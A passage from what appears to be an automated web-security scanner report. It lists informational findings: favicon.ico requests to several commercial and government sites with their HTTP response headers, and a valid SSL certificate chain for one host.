Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

28.20. http://www.retrevo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.retrevo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
ETag: W/"3638-1170459929000"
Last-Modified: Fri, 02 Feb 2007 23:45:29 GMT
Content-Length: 3638
Date: Sat, 02 Apr 2011 13:38:22 GMT
Server: Apache-Coyote/1.1
Connection: close

...... ..........&...........h.......(... ...@.......................................ok..b]..........72..*#..*$..,%..-'..|x..........*$..*#..*#..+%..,&..zv..*#..+$..,&..GB..zv......_Z..+%......*#..*$
...[SNIP]...

28.21. http://www.rightathome.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rightathome.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rightathome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 611
Server: Microsoft-IIS/7.0
Exires: Fri, 18 Mar 2011 14:14:07 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 02 Apr 2011 14:14:06 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="Expires" content="0" />
...[SNIP]...

28.22. http://www.savings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.savings.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.savings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "FEdr0ApeDYw"
Last-Modified: Fri, 01 Apr 2011 13:49:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
X-N: S
Date: Sat, 02 Apr 2011 14:00:54 GMT
Connection: close

............ .h.......(....... ..... .................................................................................................................................@@................................
...[SNIP]...

28.23. http://www.shopzilla.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopzilla.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopzilla.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"894-1299516992000"
Last-Modified: Mon, 07 Mar 2011 16:56:32 GMT
Content-Length: 894
Date: Sat, 02 Apr 2011 13:26:19 GMT

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

28.24. http://www.techbargains.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techbargains.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techbargains.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=604800
Content-Length: 1406
Date: Sat, 02 Apr 2011 14:02:50 GMT
Last-Modified: Mon, 21 Mar 2011 11:39:06 GMT
Server: Apache-Coyote/1.1

..............h.......(....... ...........@...........................t.......5...Q...+3....F...8A..{{......................+.........................................................................
...[SNIP]...

28.25. http://www.tracfone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...... ..........&...........(.......(... ...@.................................................................................................fffff...........fffff.........fff....fh.......fff....fh.
...[SNIP]...

28.26. http://www.va.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.va.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. <br><br>Please contact the VA Network and Security Operations Center at 1-800-877-4328 or email VANSOC@va.gov, i
...[SNIP]...

28.27. http://www.webs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728070988; path=/
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1296536635000"
Last-Modified: Tue, 01 Feb 2011 05:03:55 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:31:25 GMT

..............h.......(....... .................................#.JLk...............,..A.SSe.....@.7...... .A).. . .:\K. ." .,...'...<&L.+.,.....$6......&C&...........!..........'.."...l... "....
...[SNIP]...

28.28. http://www.zappos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zappos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.9.4
Last-Modified: Wed, 23 Mar 2011 20:13:27 GMT
Content-Length: 1406
X-Core-Value: 8. Do More With Less
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
X-UUID: 71b321ba-56d5-11e0-ac21-001a645b7cf4
Cache-Control: max-age=1894551
Date: Sat, 02 Apr 2011 13:31:01 GMT
Connection: close

..............h.......(....... ...........@.............................W.....z\C...........t..nM..............{f..........wR..eH...h..........t\.......x...........}..{Z...l..}b..........sV..rO...^..`
...[SNIP]...

29. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  activresa-secure2.icor.fr
Issued by:  Thawte SSL CA
Valid from:  Wed Sep 29 19:00:00 CDT 2010
Valid to:  Sun Oct 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021
